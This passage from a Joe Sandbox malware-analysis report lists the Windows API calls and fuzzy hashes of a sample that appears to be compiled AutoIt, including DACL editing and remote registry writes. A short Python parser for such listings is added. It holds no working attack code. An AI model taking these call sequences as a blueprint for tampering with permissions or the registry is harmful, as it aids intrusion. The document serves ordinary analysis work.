                                                                                  • Part of subcall function 006673E8: GetWindowLongW.USER32(00000000,000000F0), ref: 006674DB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                • String ID:
                                                                                • API String ID: 4124339563-0
                                                                                • Opcode ID: 3962a3772334f133c742427d82fc7a02ed56c4040348588d5ac3ab7b37b47638
                                                                                • Instruction ID: 3b2ac42d4971d48e2db5825102fb9c4a453a7ec0da7b5afd21e708cb483d2c6c
                                                                                • Opcode Fuzzy Hash: 3962a3772334f133c742427d82fc7a02ed56c4040348588d5ac3ab7b37b47638
                                                                                • Instruction Fuzzy Hash: 75A1C272008701BFDB009F64DC58E6BBBAAFF89334F101A19F9A2961E1D7B5E944CB51
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 005E8E14
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00626AC5
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00626AFE
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00626F43
                                                                                  • Part of subcall function 005E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005E8BE8,?,00000000,?,?,?,?,005E8BBA,00000000,?), ref: 005E8FC5
                                                                                • SendMessageW.USER32(?,00001053), ref: 00626F7F
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00626F96
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00626FAC
                                                                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 00626FB7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 2760611726-4108050209
                                                                                • Opcode ID: c12ef4ab52265684414a8a38ffbff377acb671159a06eaae6812f7cedb094ac5
                                                                                • Instruction ID: 7932e1ab1a774580d86df8f2ea4f34b08042ad884f7bbc9882ddba64e742d70d
                                                                                • Opcode Fuzzy Hash: c12ef4ab52265684414a8a38ffbff377acb671159a06eaae6812f7cedb094ac5
                                                                                • Instruction Fuzzy Hash: 3A12AC30204A61DFDB25DF24E944BBABBA6FF45310F144469F4898B261CB71AC52DF91
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000), ref: 0065273E
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0065286A
                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006528A9
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006528B9
                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00652900
                                                                                • GetClientRect.USER32(00000000,?), ref: 0065290C
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00652955
                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00652964
                                                                                • GetStockObject.GDI32(00000011), ref: 00652974
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00652978
                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00652988
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00652991
                                                                                • DeleteDC.GDI32(00000000), ref: 0065299A
                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006529C6
                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 006529DD
                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00652A1D
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00652A31
                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00652A42
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00652A77
                                                                                • GetStockObject.GDI32(00000011), ref: 00652A82
                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00652A8D
                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00652A97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-517079104
                                                                                • Opcode ID: 925ea1314ceed945477fe77754495672b7e963df0e3aba8523a282f1af4bc29c
                                                                                • Instruction ID: 7379603c2eaabdc55deafd130a12601a13382704d287d8e5a9878e1a40d055b6
                                                                                • Opcode Fuzzy Hash: 925ea1314ceed945477fe77754495672b7e963df0e3aba8523a282f1af4bc29c
                                                                                • Instruction Fuzzy Hash: F3B17E71A00616AFEB14DFA8DC49FAE7BAAFB49711F004116F914EB290D7B0ED40CB90
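The per-function "APIs" listings above share one line format: a bullet, an optional "Part of subcall function ADDR:" prefix, then `Name.MODULE(args), ref: ADDR`, where each argument is either an 8-hex-digit immediate, `?` for a value the static pass could not resolve, or a literal string Joe Sandbox recovered (the window class names and `AutoIt v3` caption that make this block recognisable as the AutoIt runtime's progress dialog). The following parser is an added example written for this page, not tooling from Joe Sandbox; it turns a pasted listing into structured records so the resolved strings and the module mix can be pulled out of a long report without reading every line. The sample input is constructed from lines that appear in the listings above, and the field names are the example's own.

```python
"""Parse Joe Sandbox per-function "APIs" listings into structured call records."""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple

# Constructed sample: seven lines copied from the listings on this page, covering
# a call with a resolved string argument, one with no argument list at all,
# a CRT helper with no module parentheses, and one "Part of subcall" entry.
SAMPLE_APIS = """\
• DestroyWindow.USER32(00000000), ref: 0065273E
• CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00652900
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00652964
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00652A1D
• GetDesktopWindow.USER32 ref: 0066113D
• _wcslen.LIBCMT ref: 0066031F
  • Part of subcall function 006673E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00667471
"""

# One API line. The argument list is optional because calls without recovered
# arguments (GetDesktopWindow, _wcslen) are printed without parentheses.
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# An immediate operand as the report prints it: 8 hex digits, optionally negative.
HEX_ARG = re.compile(r"^-?[0-9A-F]{8}$")


def parse_api_lines(text: str) -> List[Dict]:
    """Return one record per API line; headings such as "APIs" or "Strings" are skipped."""
    calls: List[Dict] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m["args"].split(",") if m["args"] is not None else []
        calls.append({
            "name": m["name"],
            "module": m["module"],
            "ref": m["ref"],
            "args": args,
            "subcall_of": m["sub"],   # address of the callee, or None for a direct call
        })
    return calls


def string_args(calls: List[Dict]) -> List[Tuple[str, str]]:
    """Arguments that are neither '?' nor an immediate: the literal strings the
    report resolved, such as window class names or the 'DISPLAY' device name."""
    found = []
    for c in calls:
        for a in c["args"]:
            if a and a != "?" and not HEX_ARG.match(a):
                found.append((c["name"], a))
    return found


def module_histogram(calls: List[Dict], include_subcalls: bool = False) -> Counter:
    """Count calls per import module; subcall entries belong to another function
    and are excluded unless asked for."""
    return Counter(
        c["module"] for c in calls if include_subcalls or c["subcall_of"] is None
    )


def find_ref(calls: List[Dict], ref: str) -> Optional[Dict]:
    """Look a call up by the 'ref:' address the report printed."""
    return next((c for c in calls if c["ref"] == ref), None)


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_APIS)
    print(len(parsed), "calls parsed")
    print("resolved strings:", string_args(parsed))
    print("modules:", module_histogram(parsed))
```

Running the block over the constructed sample reports three resolved strings (`AutoIt v3`, `DISPLAY`, `msctls_progress32`), which is exactly the "String ID" line Joe Sandbox prints for this function; on a full report the same pass gives a quick list of every literal the static analysis recovered, which is where AutoIt runtime markers and any embedded script strings show up first.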
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00644AED
                                                                                • GetDriveTypeW.KERNEL32(?,0066CB68,?,\\.\,0066CC08), ref: 00644BCA
                                                                                • SetErrorMode.KERNEL32(00000000,0066CB68,?,\\.\,0066CC08), ref: 00644D36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 3f09a3268826cf6e7676a13494722f0b564c12a40b2569ab79d46731024fdf2c
                                                                                • Instruction ID: 6c3e9118fa9a264a6f828e99b58bbbd90491b5de524557a8603fd4d4636437e0
                                                                                • Opcode Fuzzy Hash: 3f09a3268826cf6e7676a13494722f0b564c12a40b2569ab79d46731024fdf2c
                                                                                • Instruction Fuzzy Hash: 266190306062069BCF14DF28CAC7AA9BBA7FF45345B284416F806ABB91DE31DD46DB41
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 00667421
                                                                                • SetTextColor.GDI32(?,?), ref: 00667425
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0066743B
                                                                                • GetSysColor.USER32(0000000F), ref: 00667446
                                                                                • CreateSolidBrush.GDI32(?), ref: 0066744B
                                                                                • GetSysColor.USER32(00000011), ref: 00667463
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00667471
                                                                                • SelectObject.GDI32(?,00000000), ref: 00667482
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0066748B
                                                                                • SelectObject.GDI32(?,?), ref: 00667498
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 006674B7
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006674CE
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 006674DB
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066752A
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00667554
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00667572
                                                                                • DrawFocusRect.USER32(?,?), ref: 0066757D
                                                                                • GetSysColor.USER32(00000011), ref: 0066758E
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00667596
                                                                                • DrawTextW.USER32(?,006670F5,000000FF,?,00000000), ref: 006675A8
                                                                                • SelectObject.GDI32(?,?), ref: 006675BF
                                                                                • DeleteObject.GDI32(?), ref: 006675CA
                                                                                • SelectObject.GDI32(?,?), ref: 006675D0
                                                                                • DeleteObject.GDI32(?), ref: 006675D5
                                                                                • SetTextColor.GDI32(?,?), ref: 006675DB
                                                                                • SetBkColor.GDI32(?,?), ref: 006675E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: bacf23f2c501507f04907ce5309bcdbdfcee85f625253b200cf18ac6bdd241bc
                                                                                • Instruction ID: c6606cfac0a2bd4ebf67ce7b29994c2d7103196c1b69cd778218df4a4da4974a
                                                                                • Opcode Fuzzy Hash: bacf23f2c501507f04907ce5309bcdbdfcee85f625253b200cf18ac6bdd241bc
                                                                                • Instruction Fuzzy Hash: 06615E72900618AFDF019FA4DC49AEEBFBAEB09320F115115F915AB2A1DBB59940CB90
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 00661128
                                                                                • GetDesktopWindow.USER32 ref: 0066113D
                                                                                • GetWindowRect.USER32(00000000), ref: 00661144
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00661199
                                                                                • DestroyWindow.USER32(?), ref: 006611B9
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006611ED
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066120B
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0066121D
                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00661232
                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00661245
                                                                                • IsWindowVisible.USER32(00000000), ref: 006612A1
                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006612BC
                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006612D0
                                                                                • GetWindowRect.USER32(00000000,?), ref: 006612E8
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 0066130E
                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00661328
                                                                                • CopyRect.USER32(?,?), ref: 0066133F
                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 006613AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: 21745402969360441dce20a8038600792233234a193859827132475466800bd3
                                                                                • Instruction ID: 16a0aaac5aeb526c7e51db8e0c3dd49e4c6d828f086ce32e7f2ce024a2178f70
                                                                                • Opcode Fuzzy Hash: 21745402969360441dce20a8038600792233234a193859827132475466800bd3
                                                                                • Instruction Fuzzy Hash: 31B1A071604341AFD710DF64C888BAAFBE6FF85310F04891EF9999B261DB71E844CB91
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 006602E5
                                                                                • _wcslen.LIBCMT ref: 0066031F
                                                                                • _wcslen.LIBCMT ref: 00660389
                                                                                • _wcslen.LIBCMT ref: 006603F1
                                                                                • _wcslen.LIBCMT ref: 00660475
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006604C5
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00660504
                                                                                  • Part of subcall function 005EF9F2: _wcslen.LIBCMT ref: 005EF9FD
                                                                                  • Part of subcall function 0063223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00632258
                                                                                  • Part of subcall function 0063223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0063228A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 1103490817-719923060
                                                                                • Opcode ID: 64a567d810fb12a152459ade44833974baa6edcec4e3f0af9876810123b643a0
                                                                                • Instruction ID: 2b3279599b2f471f1a99e2b2247f1a00a9ed6036b0254a988ebcbdfa755fbd98
                                                                                • Opcode Fuzzy Hash: 64a567d810fb12a152459ade44833974baa6edcec4e3f0af9876810123b643a0
                                                                                • Instruction Fuzzy Hash: 27E16C312182029BDB24DF28C55186BB7E6BFC8314F14496DF896AB7A1DB30ED46CB81
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E8968
                                                                                • GetSystemMetrics.USER32(00000007), ref: 005E8970
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E899B
                                                                                • GetSystemMetrics.USER32(00000008), ref: 005E89A3
                                                                                • GetSystemMetrics.USER32(00000004), ref: 005E89C8
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005E89E5
                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005E89F5
                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005E8A28
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005E8A3C
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 005E8A5A
                                                                                • GetStockObject.GDI32(00000011), ref: 005E8A76
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 005E8A81
                                                                                  • Part of subcall function 005E912D: GetCursorPos.USER32(?), ref: 005E9141
                                                                                  • Part of subcall function 005E912D: ScreenToClient.USER32(00000000,?), ref: 005E915E
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000001), ref: 005E9183
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000002), ref: 005E919D
                                                                                • SetTimer.USER32(00000000,00000000,00000028,005E90FC), ref: 005E8AA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 939c1bae3cdc5fb3a29e5a168d8ef135d5efad5f7c7f1816298d7215e176cf4f
                                                                                • Instruction ID: a0793b8aaa6d82eb65497ce799cf457f141100d6d346368cd737d89bfe13c841
                                                                                • Opcode Fuzzy Hash: 939c1bae3cdc5fb3a29e5a168d8ef135d5efad5f7c7f1816298d7215e176cf4f
                                                                                • Instruction Fuzzy Hash: FBB17D75A0025A9FDB14DFA8DC45BBE3BB6FB49324F104229FA55EB290DB74A840CF50
                                                                                APIs
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00631114
                                                                                  • Part of subcall function 006310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631120
                                                                                  • Part of subcall function 006310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 0063112F
                                                                                  • Part of subcall function 006310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631136
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0063114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00630DF5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00630E29
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630E40
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00630E7A
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00630E96
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630EAD
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00630EB5
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00630EBC
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00630EDD
                                                                                • CopySid.ADVAPI32(00000000), ref: 00630EE4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00630F13
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00630F35
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00630F47
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630F6E
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630F75
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630F7E
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630F85
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630F8E
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630F95
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00630FA1
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630FA8
                                                                                  • Part of subcall function 00631193: GetProcessHeap.KERNEL32(00000008,00630BB1,?,00000000,?,00630BB1,?), ref: 006311A1
                                                                                  • Part of subcall function 00631193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00630BB1,?), ref: 006311A8
                                                                                  • Part of subcall function 00631193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00630BB1,?), ref: 006311B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: e1aa93f94f3e05013bef3ff79905ea739781d6076ea9d6438a9d7414f32b6d1b
                                                                                • Instruction ID: e19e2f5a0d79730985f7d5213c26b11cc41a150813ca17d76c0d8595991e20bf
                                                                                • Opcode Fuzzy Hash: e1aa93f94f3e05013bef3ff79905ea739781d6076ea9d6438a9d7414f32b6d1b
                                                                                • Instruction Fuzzy Hash: B7715F7190020AEFEF209FA5DC44FEEBBBABF05710F148119F959E6291D7719909CBA0
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065C4BD
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0066CC08,00000000,?,00000000,?,?), ref: 0065C544
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0065C5A4
                                                                                • _wcslen.LIBCMT ref: 0065C5F4
                                                                                • _wcslen.LIBCMT ref: 0065C66F
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0065C6B2
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0065C7C1
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0065C84D
